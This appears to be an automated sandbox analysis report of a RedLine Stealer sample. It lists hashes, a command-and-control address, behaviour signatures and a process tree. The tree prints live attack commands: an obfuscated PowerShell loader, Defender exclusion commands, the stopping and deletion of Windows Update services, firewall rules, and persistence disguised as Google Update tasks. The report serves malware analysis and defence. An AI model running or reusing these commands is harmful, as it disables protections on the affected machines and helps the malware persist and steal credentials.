Analysis
-
max time kernel
268s -
max time network
299s -
platform
windows10-1703_x64 -
resource
win10-20220812-en -
resource tags
-
submitted
01/11/2022, 08:51
General
-
Target
298276392e498db99e22f23813998e1d90b1e1b8ede7beef3f6a22cd6ec8840a.exe
-
Size
2.5MB
-
MD5
e8c93855d5b68012ea54fe097f37795a
-
SHA1
e28379253878db94935cce1bd40e1aa622cdb818
-
SHA256
298276392e498db99e22f23813998e1d90b1e1b8ede7beef3f6a22cd6ec8840a
-
SHA512
e73aafdd818d89da6fbd5275cd2812992504588260caa40fe0313238eb4535b70311e3dd631db33d8abdac575d20010131dabc52501edbb0b43bfa5ff50e70f2
-
SSDEEP
24576:F5UtB8YsPmYAYH3tlHCqMxJdIKH0X0ebqcyRo4N8fVxL7Wl3RuQ55313M:FyBrsXWAqpo4N8fVxul3O
Malware Config
Extracted
redline
185.215.113.83:60722
-
auth_value
e4b40909045c9c3ec576d86b8bb8fad8
Signatures
-
Modifies security service 2 TTPs 5 IoCs
-
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
-
RedLine payload 2 IoCs
-
Suspicious use of NtCreateUserProcessOtherParentProcess 4 IoCs
-
Downloads MZ/PE file
-
Executes dropped EXE 6 IoCs
-
Modifies Windows Firewall 1 TTPs 3 IoCs
-
Stops running service(s) 3 TTPs
-
UPX packed file 4 IoCs
Detects executables packed with UPX/modified UPX open source packer.
-
VMProtect packed file 2 IoCs
Detects executables packed with VMProtect commercial packer.
-
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Drops file in System32 directory 6 IoCs
-
Suspicious use of SetThreadContext 7 IoCs
-
Drops file in Program Files directory 4 IoCs
-
Drops file in Windows directory 5 IoCs
-
Launches sc.exe 10 IoCs
Sc.exe is a Windows utlilty to control services on the system.
-
Program crash 2 IoCs
-
Creates scheduled task(s) 1 TTPs 3 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Modifies data under HKEY_USERS 64 IoCs
-
Suspicious behavior: EnumeratesProcesses 64 IoCs
-
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
-
Suspicious behavior: LoadsDriver 1 IoCs
-
Suspicious use of AdjustPrivilegeToken 64 IoCs
-
Suspicious use of FindShellTrayWindow 2 IoCs
-
Suspicious use of WriteProcessMemory 64 IoCs
Processes
-
C:\Windows\system32\lsass.exeC:\Windows\system32\lsass.exe1⤵
-
C:\Windows\system32\winlogon.exewinlogon.exe1⤵
-
C:\Windows\system32\dwm.exe"dwm.exe"2⤵
- Suspicious use of FindShellTrayWindow
-
-
C:\Windows\System32\dllhost.exeC:\Windows\System32\dllhost.exe /Processid:{72deb9d1-fa9b-42cb-959a-730356acc26c}2⤵
- Suspicious behavior: EnumeratesProcesses
-
-
C:\Windows\SysWOW64\dllhost.exeC:\Windows\SysWOW64\dllhost.exe /Processid:{f8f2c844-43f6-4f9e-a7b5-f943234bfa31}2⤵
-
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k dcomlaunch -s PlugPlay1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s gpsvc1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k localservicenetworkrestricted -s lmhosts1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s NcbService1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k dcomlaunch -s LSM1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s Schedule1⤵
-
c:\windows\system32\taskhostw.exetaskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}2⤵
-
-
C:\Users\Admin\AppData\Roaming\2h4dfns5mt\svcupdater.exeC:\Users\Admin\AppData\Roaming\2h4dfns5mt\svcupdater.exe2⤵
- Executes dropped EXE
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE ".(\"{1}{0}\" -f 'eT','S') (\"6T\"+\"o\") ([tYpE](\"{2}{0}{4}{1}{3}\" -F'e','mBL','refl','y','ctiOn.AsSe') ) ; $Dlr4S = [tyPe](\"{3}{1}{2}{4}{0}\"-F'Ry','oSOfT.W','iN32.R','MICR','eGiST') ; $6TO::(\"{0}{1}\" -f 'L','oad').Invoke( (.(\"{1}{2}{0}\" -f 't-Item','g','e') (\"vARI\"+\"Ab\"+\"lE\"+\":DlR4S\") ).\"VA`luE\"::\"lOc`ALM`AChine\".(\"{2}{1}{0}\" -f 'ey','ubk','OpenS').Invoke((\"{1}{0}\"-f'E','SOFTWAR')).(\"{1}{0}{2}\" -f'u','GetVal','e').Invoke((\"{1}{2}{3}{0}\"-f'ger','dia','lers','ta'))).\"EnT`Ryp`OINt\".\"in`VoKE\"(${n`Ull},${n`ULl})"2⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵
-
-
-
C:\Program Files\Google\Chrome\updater.exe"C:\Program Files\Google\Chrome\updater.exe"2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Drops file in Program Files directory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force3⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV14⤵
-
-
-
C:\Windows\system32\cmd.execmd /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f3⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV14⤵
-
-
C:\Windows\system32\sc.exesc stop UsoSvc4⤵
- Launches sc.exe
-
-
C:\Windows\system32\sc.exesc stop WaaSMedicSvc4⤵
- Launches sc.exe
-
-
C:\Windows\system32\sc.exesc stop wuauserv4⤵
- Launches sc.exe
-
-
C:\Windows\system32\sc.exesc stop bits4⤵
- Launches sc.exe
-
-
C:\Windows\system32\sc.exesc stop dosvc4⤵
- Launches sc.exe
-
-
C:\Windows\system32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f4⤵
-
-
C:\Windows\system32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f4⤵
-
-
C:\Windows\system32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f4⤵
-
-
C:\Windows\system32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f4⤵
-
-
C:\Windows\system32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f4⤵
-
-
-
C:\Windows\system32\cmd.execmd /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 03⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV14⤵
-
-
C:\Windows\system32\powercfg.exepowercfg /x -hibernate-timeout-ac 04⤵
-
-
C:\Windows\system32\powercfg.exepowercfg /x -hibernate-timeout-dc 04⤵
-
-
C:\Windows\system32\powercfg.exepowercfg /x -standby-timeout-ac 04⤵
-
-
C:\Windows\system32\powercfg.exepowercfg /x -standby-timeout-dc 04⤵
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell <#ecgxrz#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { "schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe'''" } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "GoogleUpdateTaskMachineQC" /t REG_SZ /f /d 'C:\Program Files\Google\Chrome\updater.exe' }3⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV14⤵
-
-
-
C:\Windows\system32\dialer.exeC:\Windows\system32\dialer.exe xtrjicqmdliu3⤵
-
C:\Windows\system32\cmd.execmd /c mkdir "C:\Program Files\Google\Libs\" & wmic PATH Win32_VideoController GET Name, VideoProcessor > "C:\Program Files\Google\Libs\g.log"4⤵
- Drops file in Program Files directory
-
-
-
C:\Windows\system32\cmd.execmd /c mkdir "C:\Program Files\Google\Libs\" & wmic PATH Win32_VideoController GET Name, VideoProcessor > "C:\Program Files\Google\Libs\g.log"3⤵
- Drops file in Program Files directory
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV14⤵
-
-
C:\Windows\System32\Wbem\WMIC.exewmic PATH Win32_VideoController GET Name, VideoProcessor4⤵
-
-
-
C:\Windows\system32\dialer.exeC:\Windows\system32\dialer.exe wvhbfinhdckusjju 6E3sjfZq2rJQaxvLPmXgsF7vH8nKLC0ur3jCwye3fPpZDYkQjcS/S/TS19hCmaZeXwQ/O4+due3etuok0KCy6TAeBBK2Zj7dzTkc9P7Txuspl/ztFHeT1vDsXwtgxIFZnxGXI+P7h6Wy2BaqsXFRrbRIyylpVUfDVtjurLuTI6hfYZYlaT2c8T3z2D8KilAioXHHI3GdcX8L+5AQJHhaF3EikxjkII2qRl4IAJt0ne1Kthho/EoWoWqiJ8V46anYGIeeueaKL6G4gUS0jG8bW+uOPYpliibsIQvftJQy3GdQNbdmaQoQosbMtF/zsQIOPYtzoBcdM/sdKVWCIsST/Py6kltT+qpekCzJYBFF4LST+8+EmmopPFkm4CPe5KhMiY/+g/sQ7d50uqIjFwwoHwsdnFS1l7B7kznzCIpeqO/4VPcOjXZ8D/gqWFx/7uyyvuxXByWtdfg2SHIbTo9ax767hx8DEZJobkKiCLCF5s3S9KZPJ6oc8SVkEHvmPn3ocLOCMVNSrrmyVksnNDnuU8b1vWVxnieD7xm0UnpffWA=3⤵
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE ".(\"{1}{0}\" -f 'eT','S') (\"6T\"+\"o\") ([tYpE](\"{2}{0}{4}{1}{3}\" -F'e','mBL','refl','y','ctiOn.AsSe') ) ; $Dlr4S = [tyPe](\"{3}{1}{2}{4}{0}\"-F'Ry','oSOfT.W','iN32.R','MICR','eGiST') ; $6TO::(\"{0}{1}\" -f 'L','oad').Invoke( (.(\"{1}{2}{0}\" -f 't-Item','g','e') (\"vARI\"+\"Ab\"+\"lE\"+\":DlR4S\") ).\"VA`luE\"::\"lOc`ALM`AChine\".(\"{2}{1}{0}\" -f 'ey','ubk','OpenS').Invoke((\"{1}{0}\"-f'E','SOFTWAR')).(\"{1}{0}{2}\" -f'u','GetVal','e').Invoke((\"{1}{2}{3}{0}\"-f'ger','dia','lers','ta'))).\"EnT`Ryp`OINt\".\"in`VoKE\"(${n`Ull},${n`ULl})"2⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
-
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k localservicenetworkrestricted -s EventLog1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s ProfSvc1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s Themes1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k localservice -s nsi1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s UserManager1⤵
-
c:\windows\system32\sihost.exesihost.exe2⤵
-
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k localservice -s EventSystem1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k localservicenetworkrestricted -s Dhcp1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s SENS1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s AudioEndpointBuilder1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k localservice -s FontCache1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k networkservice -s Dnscache1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k networkservice -s NlaSvc1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s ShellHWDetection1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k localservice -s netprofm1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k appmodel -s StateRepository1⤵
-
C:\Windows\System32\spoolsv.exeC:\Windows\System32\spoolsv.exe1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k networkservice -s LanmanWorkstation1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k appmodel -s tiledatamodelsvc1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k networkservicenetworkrestricted -s PolicyAgent1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s IKEEXT1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s LanmanServer1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k networkservice -s CryptSvc1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s TrkWks1⤵
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}1⤵
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 4276 -s 7882⤵
- Program crash
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -s WinHttpAutoProxySvc1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k localserviceandnoimpersonation -s SSDPSRV1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k localservice -s CDPSvc1⤵
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}1⤵
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 3668 -s 9042⤵
- Program crash
-
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵
- Suspicious behavior: GetForegroundWindowSpam
-
C:\Users\Admin\AppData\Local\Temp\298276392e498db99e22f23813998e1d90b1e1b8ede7beef3f6a22cd6ec8840a.exe"C:\Users\Admin\AppData\Local\Temp\298276392e498db99e22f23813998e1d90b1e1b8ede7beef3f6a22cd6ec8840a.exe"2⤵
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Microsoft\brave.exe"C:\Users\Admin\AppData\Local\Microsoft\brave.exe"4⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Drops file in Program Files directory
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force5⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SYSTEM32\cmd.execmd /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f5⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\sc.exesc stop UsoSvc6⤵
- Launches sc.exe
-
-
C:\Windows\system32\sc.exesc stop WaaSMedicSvc6⤵
- Launches sc.exe
-
-
C:\Windows\system32\sc.exesc stop wuauserv6⤵
- Launches sc.exe
-
-
C:\Windows\system32\sc.exesc stop bits6⤵
- Launches sc.exe
-
-
C:\Windows\system32\sc.exesc stop dosvc6⤵
- Launches sc.exe
-
-
C:\Windows\system32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f6⤵
-
-
C:\Windows\system32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f6⤵
-
-
C:\Windows\system32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f6⤵
- Modifies security service
-
-
C:\Windows\system32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f6⤵
-
-
C:\Windows\system32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f6⤵
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell <#ecgxrz#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { "schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe'''" } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "GoogleUpdateTaskMachineQC" /t REG_SZ /f /d 'C:\Program Files\Google\Chrome\updater.exe' }5⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SYSTEM32\cmd.execmd /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 05⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\powercfg.exepowercfg /x -hibernate-timeout-dc 06⤵
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\system32\powercfg.exepowercfg /x -standby-timeout-ac 06⤵
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\system32\powercfg.exepowercfg /x -standby-timeout-dc 06⤵
- Suspicious use of AdjustPrivilegeToken
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell <#wajvhwink#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { schtasks /run /tn "GoogleUpdateTaskMachineQC" } Else { "C:\Program Files\Google\Chrome\updater.exe" }5⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\system32\schtasks.exe"C:\Windows\system32\schtasks.exe" /run /tn GoogleUpdateTaskMachineQC6⤵
-
-
-
C:\Windows\system32\dialer.exeC:\Windows\system32\dialer.exe5⤵
- Drops file in Windows directory
-
-
-
C:\Users\Admin\AppData\Local\Microsoft\chrome.exe"C:\Users\Admin\AppData\Local\Microsoft\chrome.exe"4⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Drops file in Windows directory
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\SCHTASKS.exeSCHTASKS /Create /TR "C:\Users\Admin\AppData\Local\Microsoft\chrome.exe" /TN "GoogleUpdateTask{56c41dbe-92cb-4ab7-b423-bd40cb65f9fe}" /SC ONLOGON /F /RL HIGHEST5⤵
- Creates scheduled task(s)
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force5⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\SCHTASKS.exeSCHTASKS /Create /TR "C:\Users\Admin\AppData\Local\Microsoft\chrome.exe" /TN "GoogleUpdateTaskUAC{0625ad4f-50a5-4d12-b200-288d853de0d5}" /SC HOURLY /F /MO 1 /RL HIGHEST5⤵
- Creates scheduled task(s)
-
-
C:\Windows\GoogleUpdate.exeC:\Windows\GoogleUpdate.exe5⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\netsh.exenetsh firewall add allowedprogram "C:\Windows\GoogleUpdate.exe" "Google Updater" ENABLE ALL6⤵
- Modifies Windows Firewall
-
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall firewall add rule name="Google Updater" dir=in action=allow program="C:\Windows\GoogleUpdate.exe" enable=yes6⤵
- Modifies Windows Firewall
-
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall firewall add rule name="Google Updater" dir=out action=allow program="C:\Windows\GoogleUpdate.exe" enable=yes6⤵
- Modifies Windows Firewall
-
-
-
-
C:\Users\Admin\AppData\Local\Microsoft\ofg.exe"C:\Users\Admin\AppData\Local\Microsoft\ofg.exe"4⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\SYSTEM32\cmd.exe"cmd.exe" /C schtasks /create /tn \2h4dfns5mt /tr "C:\Users\Admin\AppData\Roaming\2h4dfns5mt\svcupdater.exe" /st 00:00 /du 9999:59 /sc once /ri 1 /f5⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\schtasks.exeschtasks /create /tn \2h4dfns5mt /tr "C:\Users\Admin\AppData\Roaming\2h4dfns5mt\svcupdater.exe" /st 00:00 /du 9999:59 /sc once /ri 1 /f6⤵
- Creates scheduled task(s)
-
-
-
-
-
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k unistacksvcgroup -s CDPUserSvc1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s Browser1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s WpnService1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s Winmgmt1⤵
-
C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe"C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service1⤵
- Modifies data under HKEY_USERS
-
C:\Windows\system32\powercfg.exepowercfg /x -hibernate-timeout-ac 01⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k WerSvcGroup1⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
2.8MB
MD5eb27bb8cfa99d659e4fe023e9002ecd1
SHA1c783400302fdfae0518269c5a5a8d4bad29f42a3
SHA2569c01d90543458567c4737731ee6754cc209e4bb78ff648eb75c4d23be261ef2f
SHA512ab5ad3c094ed1f094aa82d80d298e6d0ab15a94b58b007dbe8a6219fe8498569b5d9013d770bd9910f177f94f2639d84650655e8f60113051e98b386c49c36a2
-
Filesize
2.8MB
MD5eb27bb8cfa99d659e4fe023e9002ecd1
SHA1c783400302fdfae0518269c5a5a8d4bad29f42a3
SHA2569c01d90543458567c4737731ee6754cc209e4bb78ff648eb75c4d23be261ef2f
SHA512ab5ad3c094ed1f094aa82d80d298e6d0ab15a94b58b007dbe8a6219fe8498569b5d9013d770bd9910f177f94f2639d84650655e8f60113051e98b386c49c36a2
-
Filesize
226B
MD5fdba80d4081c28c65e32fff246dc46cb
SHA174f809dedd1fc46a3a63ac9904c80f0b817b3686
SHA256b9a385645ec2edddbc88b01e6b21362c14e9d7895712e67d375874eb7308e398
SHA512b24a6784443c85bb56f8ae401ad4553c0955f587671ec7960bda737901d677d5e15d1a47d3674505fc98ea09ede2e5078a0aeb4481d3728e6715f3eac557cd29
-
Filesize
32KB
MD52545e35359f8cf95a2e6a7d5feccb489
SHA144a6e17d9ea73518ea07cac9eef725d507975453
SHA2560b9509588ce58c6d9f771fa1d449f9d78141ff15d638f4b35ee3d5b9b9e18e08
SHA512fac7661ac6c0c97f47cfb752bb0a3abe2964c1fae39c931feb0ad003df0e15d96549e2e1f8c1ef581e76e67eb0791f006899a670af7b4ec0e8cb3aa5654a832f
-
Filesize
32KB
MD5649cf0f817409389e618512f8ec4c7f5
SHA1eaecda90d07414b887b638ca83cf2b789f4268ed
SHA2566d4056f25a21f239659ca532809c9bf65842a2447388e46a33e74ec7b1f96e81
SHA5128ad76dafb5b2b9bac67dd1d4bf0497eb79c21db1bdddfd8cf6139bbbc97e606ee33227fd148ca383f40b91aedaff60b5136d409aef999ba9083b84d43214f561
-
Filesize
12KB
MD5715cf4435ee4ce62ae536ff4d3077537
SHA11328b499b3126590c80b48c7fb2ea8e27299d543
SHA256d5eb000e908394fa9a69d00cb5e089219ec987d83adc3ce5de4beeac314af23d
SHA51292de41ee6866ee716eca390bbb73cedcf98f2f895b3d6e5a9f71094925e364e31ed1f50f32cdd1709b3c61d40204008556ef9d41215d9f62750dc57b270a6167
-
Filesize
12KB
MD567c12238f6272c913f619f91f8e5a1c8
SHA1116b41c77a8b55006ee8d6e1a0e0310210d610a9
SHA256df428d485c2c6c807d774e438b1ed93d99070e6d47ded7c54f050cde5f71f295
SHA5120083b383af6b11b9b74f0e9504b8ce080cded819cc0ce83cd0da71f120f4dcb176e45ada0c0b61101e6ad94896607e77cc1934671cf29a64cee412586024dbef
-
Filesize
340B
MD5a0c4dd29ff86a7149cd228cb10dc02f7
SHA1d0088a76cc3badaeefb44f89792665deec994ab9
SHA256db344ef1454c231de65c52629513f475bc2827c82fc2b409faa8127e762615cd
SHA512a3a65e71426e6827f56ea6d3047fb6e5111ba945cbce6524e6754abb88615c37ac89e509091a2d91d90d16abe7914f32cf9ca9ce92ff9d73f70c0dbeadcaa52f
-
Filesize
438B
MD50c85a418048ade4be9afc7a7c2793fee
SHA1cad2261ca383d42f199d2764c38ec127e5ec0234
SHA25637b9ee3b70bde950cf782d0d35664082015760fcdbcc93987ce46d53105129c8
SHA51277f41b428c3b877d00620bfdd788c53d772dcad35ad65ad904dc1173f019e04ab23c5dd417e19f385d7d96e0b5aa98fa7996d979463b9909d562671d47abf54e
-
Filesize
426B
MD5eeaaf0c912e66ac761eee191a3b1c47e
SHA1d2a162d6c174960feb304e7d7fb52cc5cb1e1242
SHA256d7ad893f0f94cd6be697d2b9003b87569fae464aba96da53ea7037a600bd1358
SHA5128f8dd1d95b90359595b97197f4999838ab419bf1764fd06235676f71eef5e4b4778fb7dbf3547d3936ab90f87d59d9611bebb7ee3f4fe93df37097962fe3ec62
-
Filesize
3KB
MD5ad5cd538ca58cb28ede39c108acb5785
SHA11ae910026f3dbe90ed025e9e96ead2b5399be877
SHA256c9e6cb04d6c893458d5a7e12eb575cf97c3172f5e312b1f63a667cbbc5f0c033
SHA512c066c5d9b276a68fa636647bb29aea05bfa2292217bc77f5324d9c1d93117772ee8277e1f7cff91ec8d6b7c05ca078f929cecfdbb09582522a9067f54740af13
-
Filesize
18KB
MD507e5dc0dcf69c145ac6d366e3c48c438
